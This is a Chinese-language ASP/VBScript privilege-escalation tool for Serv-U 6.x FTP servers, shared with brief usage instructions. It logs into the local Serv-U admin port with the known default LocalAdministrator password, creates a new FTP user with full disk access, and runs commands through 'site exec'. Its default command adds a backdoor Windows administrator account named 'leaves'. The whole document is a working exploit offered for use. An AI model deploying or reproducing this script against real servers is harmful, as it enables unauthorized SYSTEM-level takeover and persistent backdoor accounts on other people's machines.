Author:落叶纷飞 来源:http://www.cnsst.org/ 使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
1<%@ LANGUAGE = VBScript %>2<%3Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit4dim action5action=request("action")6if not isnumeric(action) then response.end7user = trim(request("u"))8pass = trim(request("p"))9port = trim(request("port"))10cmd = trim(request("c"))11f=trim(request("f"))12if f="" then13f=gpath()14else15 f=left(f,2)112 collapsed lines
16end if17ftpport = ffport18timeout=319
20loginuser = "User " & user & vbCrLf21loginpass = "Pass " & pass & vbCrLf22deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf23mt = "SITE MAINTENANCE" & vbCrLf24newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf25newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _26 "-HomeDir=c:\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _27 "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _28 "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _29 "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _30 "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _31 "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\|RWAMELCDP" & vbCrLf32quit = "QUIT" & vbCrLf33newuser=replace(newuser,"c:",f)34select case action35case 136 set a=Server.CreateObject("Microsoft.XMLHTTP")37 a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""38 a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit39 set session("a")=a40%>41<form method="post" name="leaves">42<input name="u" type="hidden" id="u" value="<%=user%>"></td>43<input name="p" type="hidden" id="p" value="<%=pass%>"></td>44<input name="port" type="hidden" id="port" value="<%=port%>"></td>45<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">46<input name="f" type="hidden" id="f" value="<%=f%>" size="50">47<input name="action" type="hidden" id="action" value="2"></form>48<script language="javascript">49document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>...<center>');50setTimeout("document.all.leaves.submit();",4000);51</script>52<%53case 254 set b=Server.CreateObject("Microsoft.XMLHTTP")55 b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""56 b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit57 set session("b")=b58%>59<form method="post" name="leaves">60<input name="u" type="hidden" id="u" value="<%=user%>"></td>61<input name="p" type="hidden" id="p" value="<%=pass%>"></td>62<input name="port" type="hidden" id="port" value="<%=port%>"></td>63<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">64<input name="f" type="hidden" id="f" value="<%=f%>" size="50">65<input name="action" type="hidden" id="action" value="3"></form>66<script language="javascript">67document.write('<center>正在提升权限,请等待...,<center>');68setTimeout("document.all.leaves.submit();",4000);69</script>70<%71case 372 set c=Server.CreateObject("Microsoft.XMLHTTP")73 c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""74 c.send loginuser & loginpass & mt & deldomain & quit75 set session("c")=c76%>77<center>提权完毕,已执行了命令:78<font color=red><%=cmd%></font>79<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">80</center>81<%82case else83on error resume next84 set a=session("a")85 set b=session("b")86 set c=session("c")87 a.abort88 Set a = Nothing89 b.abort90 Set b = Nothing91 c.abort92 Set c = Nothing93%>94<center><form method="post" name="leaves">95 <tr align="center" valign="middle">96 <td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>97 </tr>98 <tr align="center" valign="middle">99 <td width="200">用户名:</td>100<td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>101 </tr>102 <tr align="center" valign="middle">103 <td>口 令:</td>104 <td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>105 </tr>106 <tr align="center" valign="middle">107 <td>端 口:</td>108 <td><input name="port" type="text" id="port" value="43958"></td>109服务器端口:110 <td><input name="ffport" type="text" id="ffport" value="65500"></td>111服务器IP:112 <td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>113 </tr>114 <tr align="center" valign="middle">115 <td>系统路径:</td>116 <td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>117 </tr>118 <tr align="center" valign="middle">119 <td>命 令:</td>120 <td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>121 </tr>122 <tr align="center" valign="middle">123 <td colspan="2"><input type="submit" name="Submit" value="提交">124 <input type="reset" name="Submit2" value="重置">125 <input name="action" type="hidden" id="action" value="1"></td>126 </tr>127</form></center>
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
1<% end select2function Gpath()3on error resume next4 err.clear5 set f=Server.CreateObject("Scripting.FileSystemObject")6 if err.number>0 then7gpath="c:"8 exit function9 end if10gpath=f.GetSpecialFolder(0)11gpath=lcase(left(gpath,2))12set f=nothing13end function14Function GName()15If request.servervariables("SERVER_PORT")="80" Then7 collapsed lines
16GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))17Else18GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))19End If20End Function21%>22``